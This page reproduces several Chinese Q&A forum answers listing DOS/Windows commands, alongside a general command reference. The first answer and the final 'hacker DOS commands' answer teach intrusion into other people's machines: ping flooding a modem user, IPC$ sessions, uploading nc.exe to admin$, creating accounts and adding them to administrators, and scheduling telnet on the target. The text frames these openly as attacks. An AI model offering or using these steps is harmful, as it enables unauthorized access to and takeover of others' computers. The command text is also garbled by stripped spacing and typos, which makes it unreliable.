常用DOS命令大全及其用法详解.doc

常用DOS命令大全及其用法详解.doc

ID:20685736

大小:546.50 KB

页数:71页

时间:2018-10-14

上传者:U-20936
常用DOS命令大全及其用法详解.doc_第1页
常用DOS命令大全及其用法详解.doc_第2页
常用DOS命令大全及其用法详解.doc_第3页
常用DOS命令大全及其用法详解.doc_第4页
常用DOS命令大全及其用法详解.doc_第5页
资源描述:

《常用DOS命令大全及其用法详解.doc》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

求常用DOS命令大全及其用法!!!浏览次数:63883次悬赏分:0|解决时间:2009-5-2113:38|提问者:雪枫之哀伤越详细的越好~~~拜托了!!!最佳答案既然自己不愿搜,我就帮你搜吧一,ping它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping/?回车,出现如图1。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。-t表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。-l定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。-n定义向目标IP发送数据包的次数,默认为3次。如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。说明一下,如果-t参数和-n参数一起使用,ping命令就以放在后面的参数为标准,比如“pingIP-t-n3”,虽然使用了-t参数,但并不是一直ping下去,而是只ping3次。另外,ping命令不一定非得pingIP,也可以直接ping主机域名,这样就可以得到主机的IP。下面我们举个例子来说明一下具体用法,如图2。这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小。从TTL的返回值可以初步判断被ping主机的操作系统,之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。(小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix) 至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对别人进行ping攻击……这些就靠大家自己发挥了。二,nbtstat该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。-a使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息如图3(下同)。-A这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。-n列出本地机器的NETBIOS信息。当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。三,netstat这是一个用来查看网络状态的命令,操作简便功能强大。-a查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,如图4。这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat-aIP。-r列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat-rIP。四,tracert跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。如图5。这里说明数据从本地机器传输到192.168.0.1的机器上,中间没有经过任何中转,说明这两台机器是在同一段局域网内。用法:tracertIP。五,net这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net/?回车如图6。 在这里,我们重点掌握几个入侵常用的子命令。netview使用此命令查看远程主机的所以共享资源。命令格式为netview\IP。如图7。netuse把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。命令格式为netusex:\IPsharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接(netuse\IPIPC$"password"/user:"name"),如图8。建立了IPC$连接后,呵呵,就可以上传文件了:copync.exe\192.168.0.7admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。netstart使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:netstartservername,如图9,成功启动了telnet服务。netstop入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和netstart同。netuser查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的netuser,可以查看所有用户,包括已经禁用的。下面分别讲解。1,netuserabcd1234/add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。2,netuserabcd/del,将用户名为abcd的用户删除。3,netuserabcd/active:no,将用户名为abcd的用户禁用。4,netuserabcd/active:yes,激活用户名为abcd的用户。5,netuserabcd,查看用户名为abcd的用户的情况,如图10。netlocalgroup查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法:netlocalgroupgroupnameusername/add,如图11。现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用netuserabcd来查看他的状态,和图10进行比较就可以看出来。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。nettime这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:nettime\IP。如图12。六,at这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道nettime的重要了吧?)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:attimecommand\computer。如图13。表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里netstarttelnet即为开启telnet服务的命令)。七,ftp大家对这个命令应该比较熟悉了吧?网络上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?下面就给出基本的ftp命令使用方法。首先在命令行键入ftp回车,出现ftp的提示符,这时候可以键入“help”来查看帮助(任何DOS命令都可以使用此方法查看其帮助),如图14。大家可能看到了,这么多命令该怎么用?其实也用不到那么多,掌握几个基本的就够了。首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入“open主机IPftp端口”回车即可,一般端口默认都是21,可以不写。接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍,如图15。 用户名和密码都是ftp,密码是不显示的。当提示****loggedin时,就说明登陆成功。这里因为是匿名登陆,所以用户显示为Anonymous。接下来就要介绍具体命令的使用方法了,如图16。dir跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。cd进入某个文件夹。get下载文件到本地机器。put上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了,如果可以,呵呵,该怎么利用就不多说了,大家就自由发挥去吧。delete删除远程ftp服务器上的文件。这也必须保证你有可写的权限。bye退出当前连接。quit同上。八,telnet功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。为什么?它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以administrator身份连接了远程机器后,就可以用它来干你想干的一切了。下面介绍一下使用方法,首先键入telnet回车,再键入help查看其帮助信息,如图17。然后在提示符下键入openIP回车,这时就出现了登陆窗口,让你输入合法的用户名和密码,这里输入任何密码都是不显示的,如图18。当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了,如图19。这里我使用的超级管理员权限登陆的。dos命令大全浏览次数:129703次悬赏分:0|解决时间:2008-7-1713:17|提问者:ying1314iu本人要操作系统DOS全部的命令最佳答案MSDOS命令大全一、基础命令1dir无参数:查看当前所在目录的文件和文件夹。 /s:查看当前目录已经其所有子目录的文件和文件夹。/a:查看包括隐含文件的所有文件。/ah:只显示出隐含文件。/w:以紧凑方式(一行显示5个文件)显示文件和文件夹。/p:以分页方式(显示一页之后会自动暂停)显示。|more:前面那个符号是“”上面的那个,叫做重定向符号,就是把一个命令的结果输出为另外一个命令的参数。more也是一个命令,dir/w|more得到的结果和dir/w/p的结果是一样的。其他的参数大家可以用:dir/?查看。2cdcd目录名:进入特定的目录。如果看到有个目录显示为:abcdefghi就输入:cdabcdef.ghi进入该目录。cd退回到根目录。cd..退回到上一级目录。3mdrdmd目录名:建立特定的文件夹。(dos下面习惯叫目录,win下面习惯叫文件夹。呵呵!)rd目录名:删除特定的文件夹。4cls清除屏幕。5copycopy路径文件名路径文件名:把一个文件拷贝到另一个地方。6movemove路径文件名路径文件名:把一个文件移动(就是剪切+复制)到另一个地方。7deldel文件名:删除一个文件。del*.*:删除当前文件夹下所有文件。del不能删除文件夹。8deltree删除文件夹和它下面的所有子文件夹还有文件,厉害。。。不要乱用。9formatformatx::x代表盘符,格式化一个分区。在dos下是用fat文件系统格式化的,在windows2000安装的时候会问你要不要转换为ntfs。 10typetype文本文件名:显示出文本文件的内容。11edit其实这是个小程序,编辑文本文件用的。12renren旧文件名新文件名:改文件名。二、关于网络的常用命令1pingping主机ip或名字:向目标主机发送4个icmp数据包,测试对方主机是否收到并响应,一般常用于做普通网络是否通畅的测试。但是ping不同不代表网络不通,有可能是目标主机装有防火墙并且阻止了icmp响应。ping-t:不停的发送数据包。当然都很小,不能称作攻击。有些人自己写了一些类似于ping命令的程序,不停的发送很大的数据包,以阻塞目标主机的网络连接。2net建议是用net/?获取具体帮助信息。实在是有很多参数,参数下面还有参数。常用:netview\主机来看共享,netstart/stop服务来启动和停止服务,信使服务个人不太喜欢。3netstatnetstat主机:查看主机当前的tcp/ip连接状态,如端口的状态。4nbtstatnbtstat主机:查看主机使用的NetBIOSname。5tracerttracert主机:查看从你自己到目标逐机到底经过了那些路径。如:tracertwww.ncie.gov.cn然后等待。。。就会看到你经过的一个个路由节点,一般大一点的路由器,如电信的主干路由,除了ip以外,都有英文标示的。6pathpingpathping主机:类似tracert,但可以显示一些tracert不能显示出来的信息。可以自己试试。7ftp 字符方式的ftp,我喜欢用;)不用装cuteftp了。8telnet字符方式的远程登录程序,是网络人员极其爱用的远程登录程序。我最近常用来调试邮件服务器。9ipconfig非常有用的网络配置、排错。。。命令。不加参数显示当前机器的网络接口状态。/all先是详细的信息。/release释放当前ip。/renew重新申请ip。/flushdns刷新dns缓存。/registerdns重新栽dns服务器上注册自己。。。。。。。10arp操作当前的arp缓存。-a显示arp缓存。-d删除一条缓存纪录。-s田家一条缓存纪录。11nslookup排除dns错误的利器。是一个交互的工具。使用之前请先努力弄清楚dns的作用以及dns的工作原理。xcopy是一个外部命令,也就是说,是一个小程序,有的时候会发现软盘上没有,硬盘上也没有。。。昏倒。。。当然勇气来使比copy好用,我喜欢加/e参数。smartdrv.exe加载磁盘缓存,参数是缓存的大小,单位是kb。如:smartdrv32768就是加载32M的缓存。缓存的作用在你安装WIN2K的时候非常明显!不加缓存装WIN2KPRO要3小时左右,加载8M缓存后,只要30分钟。原理是在内存中划分出一块区域,在安装期间不断地把硬盘上的数据读取到那块缓存区域中,充分利用了内存。AT和任务计划作用一样。以下是使用方法,可以通过在命令提示符下面输入:AT/?获得帮助。AT命令安排在特定日期和时间运行命令和程序。要使用AT命令,计划服务必须已在运行中。~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~AT[\computername][[id][/DELETE]|/DELETE[/YES]]AT[\computername]time[/INTERACTIVE] [/EVERY:date[,...]|/NEXT:date[,...]]"command"\computername指定远程计算机。如果省略这个参数,会计划在本地计算机上运行命令。\127.0.0.1代表本机。和不加这个参数意思一样。id指定给已计划命令的识别号。用来识别任务,比如你要添加好几个任务,ID=1就代表第一个喽!/delete删除某个已计划的命令。如果省略id,计算机上所有已计划的命令都会被删除。/yes不需要进一步确认时,跟删除所有作业的命令一起使用。time指定运行命令的时间。/interactive允许作业在运行时,与当时登录的用户桌面进行交互。/every:date[,...]每个月或每个星期在指定的日期运行命令。如果省略日期,则默认为在每月的本日运行。/next:date[,...]指定在下一个指定日期(如,下周四)运行命令。如果省略日期,则默认为在每月的本日运行。"command"准备运行的WindowsNT命令或批处理程序。DOS命令全集常用浏览次数:1994次悬赏分:0|提问时间:2006-5-1708:57|提问者:shenhaitao00其他回答共3条一)MD——建立子目录1.功能:创建新的子目录2.类型:内部命令3.格式:MD[盘符:][路径名]〈子目录名〉4.使用说明:(1)“盘符”:指定要建立子目录的磁盘驱动器字母,若省略,则为当前驱动器;(2)“路径名”:要建立的子目录的上级目录名,若缺省则建在当前目录下。例:(1)在C盘的根目录下创建名为FOX的子目录;(2)在FOX子目录下再创建USER子目录。C:、>MDFOX(在当前驱动器C盘下创建子目录FOX)C:、>MDFOX、USER(在FOX子目录下再创建USER子目录)(二)CD——改变当前目录1.功能:显示当前目录2.类型:内部命令 3.格式:CD[盘符:][路径名][子目录名]4.使用说明:(1)如果省略路径和子目录名则显示当前目录;(2)如采用“CD、”格式,则退回到根目录;(3)如采用“CD.。”格式则退回到上一级目录。例:(1)进入到USER子目录;(2)从USER子目录退回到子目录;(3)返回到根目录。C:、>CDFOX、USER(进入FOX子目录下的USER子目录)C:、FOX、USER>CD.。(退回上一级根目录)C:、FOX>CD、(返回到根目录)C:、>(三)RD——删除子目录命令1.功能:从指定的磁盘删除了目录。2.类型:内部命令3.格式:RD[盘符:][路径名][子目录名]4.使用说明:(1)子目录在删除前必须是空的,也就是说需要先进入该子目录,使用DEL(删除文件的命令)将其子目录下的文件删空,然后再退回到上一级目录,用RD命令删除该了目录本身;(2)不能删除根目录和当前目录。例:要求把C盘FOX子目录下的USER子目录删除,操作如下:第一步:先将USER子目录下的文件删空;C、>DELC:、FOX、USER、*。*第二步,删除USER子目录。C、>RDC:、FOX、USER(四)DIR——显示磁盘目录命令1.功能:显示磁盘目录的内容。2.类型:内部命令3.格式:DIR[盘符][路径][/P][/W]4.使用说明:/P的使用;当欲查看的目录太多,无法在一屏显示完屏幕会一直往上卷,不容易看清,加上/P参数后,屏幕上会分面一次显示23行的文件信息,然后暂停,并提示;Pressanykeytocontinue/W的使用:加上/W只显示文件名,至于文件大小及建立的日期和时间则都省略。加上参数后,每行可以显示五个文件名。PATH——路径设置命令1.功能:设备可执行文件的搜索路径,只对文件有效。2.类型:内部命令3.格式:PATH[盘符1]目录[路径名1]{[;盘符2:],〈目录路径名2〉…}4.使用说明:(1)当运行一个可执行文件时,DOS会先在当前目录中搜索该文件,若找到则运行之;若找不到该文件,则根据PATH命令所设置的路径,顺序逐条地到目录中搜索该文件;(2)PATH命令中的路径,若有两条以上,各路径之间以一个分号“;”隔开;(3)PATH命令有三种使用方法: PATH[盘符1:][路径1][盘符2:][路径2]…(设定可执行文件的搜索路径)PATH:(取消所有路径)PATH:(显示目前所设的路径)(六)TREE——显示磁盘目录结构命令1.功能:显示指定驱动器上所有目录路径和这些目录下的所有文件名。2.类型:外部命令3.格式:TREE[盘符:][/F][》PRN]4.使用说明:(1)使用/F参数时显示所有目录及目录下的所有文件,省略时,只显示目录,不显示目录下的文件;(2)选用>PRN参数时,则把所列目录及目录中的文件名打印输出。(七)DELTREE——删除整个目录命令1.功能:将整个目录及其下属子目录和文件删除。2.类型:外部命令3.格式:DELTREE[盘符:]〈路径名〉4.使用说明:该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除,而且不管文件的属性为隐藏、系统或只读,只要该文件位于删除的目录之下,DELTREE都一视同仁,照删不误。使用时务必小心!五、磁盘操作类命令(一)FORMAT——磁盘格式化命令1.功能:对磁盘进行格式化,划分磁道和扇区;同时检查出整个磁盘上有无带缺陷的磁道,对坏道加注标记;建立目录区和文件分配表,使磁盘作好接收DOS的准备。2.类型:外部命令3.格式:FORMAT〈盘符:〉[/S][/4][/Q]4.使用说明:(1)命令后的盘符不可缺省,若对硬盘进行格式化,则会如下列提示:WARNING:ALLDATAONNON——REMOVABLEDISKDRIVEC:WILLBELOST!ProceedwithFormat(Y/N)?(警告:所有数据在C盘上,将会丢失,确实要继续格式化吗?)(2)若是对软盘进行格式化,则会如下提示:InsertmewdiskettefordriveA;andpressENTERwhenready…(在A驱中插入新盘,准备好后按回车键)。(3)选用[/S]参数,将把DOS系统文件IO.SYS、MSDOS.SYS及COMMAND.COM复制到磁盘上,使该磁盘可以做为DOS启动盘。若不选用/S参数,则格式化后的磙盘只能读写信息,而不能做为启动盘;(4)选用[/4]参数,在1.2MB的高密度软驱中格式化360KB的低密度盘;(5)选用[/Q]参数,快速格式化,这个参数并不会重新划分磁盘的磁道貌岸然和扇区,只能将磁盘根目录、文件分配表以及引导扇区清成空白,因此,格式化的速度较快。 (6)选用[/U]参数,表示无条件格式化,即破坏原来磁盘上所有数据。不加/U,则为安全格式化,这时先建立一个镜象文件保存原来的FAT表和根目录,必要时可用UNFORRMAT恢复原来的数据。(二)UNFORMAT恢复格式化命令1.功能:对进行过格式化误操作丢失数据的磁盘进行恢复。2.类型:外部命令3.格式:UNFORMAT〈盘符〉[/L][/U][/P][/TEST]4.使用说明:用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区(包括FAT、根目录、BOOT扇区及硬盘分区表)受损时,也可以用UNFORMAT来抢救。(1)选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息,但不会真的做FORMAT工作。(2)选用/P参数将显示于屏幕的报告(包含/L参数所产生的信息)同时也送到打印机。运行时屏幕会显示:“PrintoutwillbesenttoLPT1”(3)选用/TEST参数只做模拟试验(TEST)不做真正的写入动作。使用此参数屏幕会显示:“Simulationonly”(4)选用/U参数不使用MIRROR映像文件的数据,直接根据磁盘现状进行UNFORMAT。(5)选用/PSRTN;修复硬盘分区表。若在盘符之后加上/P、/L、/TEST之一,都相当于使用了/U参数,UNFORMAT会“假设”此时磁盘没有MIRROR映像文件。注意:UNFORMAT对于刚FORMAT的磁盘,可以完全恢复,但FORMAT后若做了其它数据的写入,则UNFORMAT就不能完整的救回数据了。UNFORMAT并非是万能的,由于使用UNFORMAT会重建FAT与根目录,所以它也具有较高的危险性,操作不当可能会扩大损失,如果仅误删了几个文件或子目录,只需要利用UNDELETE就够了。三)CHKDSK——检查磁盘当前状态命令1.功能:显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。2.类型:外部命令3.格式:CHKDSK[盘符:][路径][文件名][/F][/V]4.使用说明:(1)选用[文件名]参数,则显示该文件占用磁盘的情况;(2)选[/F]参数,纠正在指定磁盘上发现的逻辑错误;(3)选用[/V]参数,显示盘上的所有文件和路径。(四)DISKCOPY——整盘复制命令1.功能:复制格式和内容完全相同的软盘。2.类型:外部命令3.格式:DISKCOPY[盘符1:][盘符2:]4.使用说明:(1)如果目标软盘没有格式化,则复制时系统自动选进行格式化。(2)如果目标软盘上原有文件,则复制后将全部丢失。(3)如果是单驱动器复制,系统会提示适时更换源盘和目标盘,请操作时注意分清源盘和目标盘。(五)LABEL——建立磁盘卷标命令 1.功能:建立、更改、删除磁盘卷标。2.类型:外部命令3.格式:LABEL[盘符:][卷标名]4.使用说明:(1)卷标名为要建立的卷标名,若缺省此参数,则系统提示键入卷标名或询问是否删除原有的卷标名;(2)卷标名由1至11个字符组成。(六)VOL——显示磁盘卷标命令1.功能:查看磁盘卷标号。2.类型:内部命令3.格式:VOL[盘符:]4.使用说明:省略盘符,显示当前驱动器卷标。(七)SCANDISK——检测、修复磁盘命令1.功能:检测磁盘的FAT表、目录结构、文件系统等是否有问题,并可将检测出的问题加以修复。2.类型:外部命令3.格式:SCANDISK[盘符1:]{[盘符2:]…}[/ALL]4.使用说明:(1)CCANDISK适用于硬盘和软盘,可以一次指定多个磁盘或选用[/ALL]参数指定所有的磁盘;(2)可自动检测出磁盘中所发生的交叉连接、丢失簇和目录结构等逻辑上的错误,并加以修复。(八)DEFRAG——重整磁盘命令1.。功能:整理磁盘,消除磁盘碎块。2.类型:外部命令3.格式:DEFRAG[盘符:][/F]4.使用说明:选用/F参数,将文件中存在盘上的碎片消除,并调整磁盘文件的安排,确保文件之间毫无空隙。从而加快读盘速度和节省磁盘空间。(九)SYS——系统复制命令1.功能:将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM传送到指定的驱动器上。2.类型:外部命令3.格式:SYS[盘符:]*使用说明:如果磁盘剩余空间不足以存放系统文件,则提示:Noroomforondestinationdisk.文件操作类命令(一)COPY文件复制命令1.功能:拷贝一个或多个文件到指定盘上。2.类型:内部命令3.格式:COPY[源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]4.使用说明:(1)COPY是文件对文件的方式复制数据,复制前目标盘必须已经格式化;(2)复制过程中,目标盘上相同文件名称的旧文件会被源文件取代; (3)复制文件时,必须先确定目标般有足够的空间,否则会出现;insufficient的错误信息,提示磁盘空间不够;(4)文件名中允许使用通配举“*”“?”,可同时复制多个文件;(5)COPY命令中源文件名必须指出,不可以省略。(6)复制时,目标文件名可以与源文件名相同,称作“同名拷贝”此时目标文件名可以省略;(7)复制时,目标文件名也可以与源文件名不相同,称作“异名拷贝”,此时,目标文件名不能省略;(8)复制时,还可以将几个文件合并为一个文件,称为“合并拷贝”,格式如下:COPY;[源盘][路径]〈源文件名1〉〈源文件名2〉…[目标盘][路径]〈目标文件名〉;(9)利用COPY命令,还可以从键盘上输入数据建立文件,格式如下:COPYCON[盘符:][路径]〈文件名〉;(10)注意:COPY命令的使用格式,源文件名与目标文件名之间必须有空格!(二)XCOPY——目录复制命令1.功能:复制指定的目录和目录下的所有文件连同目录结构。2.类型:外部命令3.格式:XCOPY[源盘:]〈源路径名〉[目标盘符:][目标路径名][/S][/V][/E]4.使用说明:(1)XCOPY是COPY的扩展,可以把指定的目录连文件和目录结构一并拷贝,但不能拷贝隐藏文件和系统文件;(2)使用时源盘符、源目标路径名、源文件名至少指定一个;(3)选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数,否则/S不会拷贝空目录,若不指定/S参数,则XCOPY只拷贝源目录本身的文件,而不涉及其下的子目录;(4)选用/V参数时,对的拷贝的扇区都进行较验,但速度会降低。(三)TYPE——显示文件内容命令1.功能:显示ASCII码文件的内容。2.类型:内部命令。3.格式:TYPE[盘符:][路径]〈文件名〉4.使用说明:(1)显示由ASCII码组成的文本文件,对。EXE.COM等为扩展名的文件,其显示的内容是无法阅读的,没有实际意义2;(2)该命令一次只可以显示一个文件的内容,不能使用通配符;(3)如果文件有扩展名,则必须将扩展名写上;(4)当文件较长,一屏显示不下时,可以按以下格式显示;TYPE[盘符:][路径]〈文件名〉|MORE,MORE为分屏显示命令,使用些参数后当满屏时会暂停,按任意键会继续显示。(5)若需将文件内容打印出来,可用如下格式:TYPE[盘符:][路径]〈文件名〉,>PRN此时,打印机应处于联机状态。(四)REN——文件改名命令1.功能:更改文件名称2.类型:内部命令 3.格式:REN[盘符:][路径]〈旧文件名〉〈新文件名〉4.使用说明:(1)新文件名前不可以加上盘符和路径,因为该命令只能对同一盘上的文件更换文件名;(2)允许使用通配符更改一组文件名或扩展名。(五)FC——文件比较命令1.功能:比较文件的异同,并列出差异处。2.类型:外部命令3.格式:FC[盘符:][路径名]〈文件名〉[盘符:][路径名][文件名][/A][/B][/C][/N]4.使用说明:(1)选用/A参数,为ASCII码比较模式;(2)选用/B参数,为二进制比较模式;(3)选用/C参数,将大小写字符看成是相同的字符。(4)选用/N参数,在ASCII码比较方式下,显示相异处的行号。(六)ATTRIB——修改文件属性命令1.功能:修改指定文件的属性。(文件属性参见2.5.4(二)文件属性一节)2.类型:外部命令。3.格式:ATTRIB[文件名][R][——R][A][——A][H][——H][——S]4.使用说明:(1)选用R参数,将指定文件设为只读属性,使得该文件只能读取,无法写入数据或删除;选用——R参数,去除只读属性;(2)选用A参数,将文件设置为档案属性;选用——A参数,去除档案属性;(3)选用H参数,将文件调协为隐含属性;选用——H参数,去隐含属性;(4)选用S参数,将文件设置为系统属性;选用——S参数,去除系统属性;(5)选用/S参数,对当前目录下的所有子目录及作设置。七)DEL——删除文件命令1.功能:删除指定的文件。2.类型:内部命令3.格式:DEL[盘符:][路径]〈文件名〉[/P]4.使用说明:(1)选用/P参数,系统在删除前询问是否真要删除该文件,若不使用这个参数,则自动删除;(2)该命令不能删除属性为隐含或只读的文件;(3)在文件名称中可以使用通配符;(4)若要删除磁盘上的所有文件(DEL*•*或DEL•),则会提示:(Areyousure?)(你确定吗?)若回答Y,则进行删除,回答N,则取消此次删除作业。(八)UNDELETE——恢复删除命令1.功能:恢复被误删除命令2.类型:外部命令。3.格式:UNDELETE[盘符:][路径名]〈文件名〉[/DOS]/LIST][/ALL]4.使用说明:使用UNDELETE可以使用“*”和“?”通配符。 (1)选用/DOS参数根据目录里残留的记录来恢复文件。由于文件被删除时,目录所记载斩文件名第一个字符会被改为E5,DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件,所以,UNDELETE会要求用户输入一个字符,以便将文件名字补齐。但此字符不必和原来的一样,只需符合DOS的文件名规则即可。(2)选用/LIST只“列出”符合指定条件的文件而不做恢复,所以对磁盘内容完全不会有影响。(3)选用/ALL自动将可完全恢复的文件完全恢复,而不一一地询问用户,使用此参数时,若UNDELTE利用目录里残留的记录来将文件恢复,则会自动选一个字符将文件名补齐,并且使其不与现存文件名相同,选用字符的优选顺序为:#%——0000123456789A~Z。UNDELETE还具有建立文件的防护措施的功能,已超出本课程授课范围,请读者在使用些功能时查阅有关DOS手册。七、其它命令(一)CLS——清屏幕命令1功能:清除屏幕上的所有显示,光标置于屏幕左上角。2类型:内部命令3格式:CLS(二)VER查看系统版本号命令1功能:显示当前系统版本号2类型:内部命令3格式:VER(三)DATA日期设置命令1功能:设置或显示系统日期。2类型:内部命令3格式:DATE[mm——dd——yy]4使用说明:(1)省略[mm——dd——yy]显示系统日期并提示输入新的日期,不修改则可直接按回车键,[mm——dd——yy]为“月月——日日——年年”格式;(2)当机器开始启动时,有自动处理文件(AUTOEXEC.BAT)被执行,则系统不提示输入系统日期。否则,提示输入新日期和时间。(四)TIME系统时钟设置命令1功能:设置或显示系统时期。2类型:内部命令3格式:TIME[hh:mm:ss:xx]4使用说明:(1)省略[hh:mm:ss:xx],显示系统时间并提示输入新的时间,不修改则可直接按回车键,[hh:mm:ss:xx]为“小时:分钟:秒:百分之几秒”格式;(2)当机器开始启动时,有自动处理文件(AUTOEXEC.BAT)被执行,则系统不提示输入系统日期。否则,提示输入新日期和时间。(五)MEM查看当前内存状况命令1功能:显示当前内存使用的情况2类型:外部命令3格式:MEM[/C][/F][/M][/P]4使用说明:(1)选用/C参数列出装入常规内存和CMB的各文件的长度,同时也显示内存空间的使用状况和最大的可用空间; (2)选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小;(3)选用/M参数显示该模块使用内存地地址、大小及模块性质;(4)选用/P参数指定当输出超过一屏时,暂停供用户查看。(六)MSD显示系统信息命令1功能:显示系统的硬件和操作系统的状况。2类型:外部命令3格式:MSD[/I][/B][/S]4使用说明:(1)选用/I参数时,不检测硬件;(2)选用/B参数时,以黑白方式启动MSD;(3)选用/S参数时,显示出简明的系统报告黑客dos命令大全浏览次数:21529次悬赏分:10|解决时间:2010-4-2217:01|提问者:0龍少爺0谁有黑客DOS命令大全的告诉我............谢谢了.....最佳答案netuse\ipipc$""/user:""建立IPC空链接netuse\ipipc$"密码"/user:"用户名"建立IPC非空链接netuseh:\ipc$"密码"/user:"用户名"直接登陆后映射对方C:到本地为H:netuseh:\ipc$登陆后映射对方C:到本地为H:netuse\ipipc$/del删除IPC链接netuseh:/del删除映射对方到本地的为H:的映射netuser用户名密码/add建立用户netuserguest/active:yes激活guest用户netuser查看有哪些用户netuser帐户名查看帐户的属性netlocalgroupadministrators用户名/add把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数netstart查看开启了哪些服务netstart服务名开启服务;(如:netstarttelnet,netstartschedule)netstop服务名停止某服务nettime\目标ip查看对方时间nettime\目标ip/set设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息netview查看本地局域网内开启了哪些共享netview\ip查看对方局域网内开启了哪些共享netconfig显示系统网络设置netlogoff断开连接的共享netpause服务名暂停某服务 